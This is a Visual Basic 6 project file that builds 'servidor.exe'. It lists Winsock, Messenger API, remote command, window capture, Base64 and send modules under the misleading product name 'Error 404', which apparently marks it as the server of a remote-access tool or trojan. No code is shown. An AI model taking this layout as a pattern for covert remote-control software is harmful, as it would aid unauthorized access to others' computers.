Type=Exe
Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#..\..\..\..\..\Windows\system32\stdole2.tlb#OLE Automation
Reference=*\G{E02AD29E-80F5-46C6-B416-9B3EBDDF057E}#1.0#0#..\..\..\..\..\Program Files\Windows Live\Messenger\msnmsgr.exe\2#Messenger API Type Library
Object={248DD890-BB45-11CF-9ABC-0080C7E7B78D}#1.0#0; mswinsck.ocx
Module=modAPIS; modAPIS.bas
Form=frmMain.frm
Form=frmChat.frm
Module=modBase64; modBase64.bas
Module=modCaptureWindow; modCaptureWindow.bas
Module=modCMD; modCMD.bas
Module=modWindow; modWindow.bas
Module=modSend; modSend.bas
Startup="frmMain"
HelpFile=""
Title="Server"
ExeName32="servidor.exe"
Path32="..\..\..\..\..\Users\ASSaulting\Desktop"
Command32=""
Name="Server"
HelpContextID="0"
CompatibleMode="0"
MajorVer=1
MinorVer=0
RevisionVer=0
AutoIncrementVer=0
ServerSupportFiles=0
VersionCompanyName="ASSoftware"
VersionLegalCopyright="ASSaulting"
VersionProductName="Error 404"
CompilationType=0
OptimizationType=0
FavorPentiumPro(tm)=0
CodeViewDebugInfo=0
NoAliasing=0
BoundsCheck=0
OverflowCheck=0
FlPointCheck=0
FDIVCheck=0
UnroundedFP=0
StartMode=0
Unattended=0
Retained=0
ThreadPerObject=0
MaxNumberOfThreads=1
DebugStartupOption=0
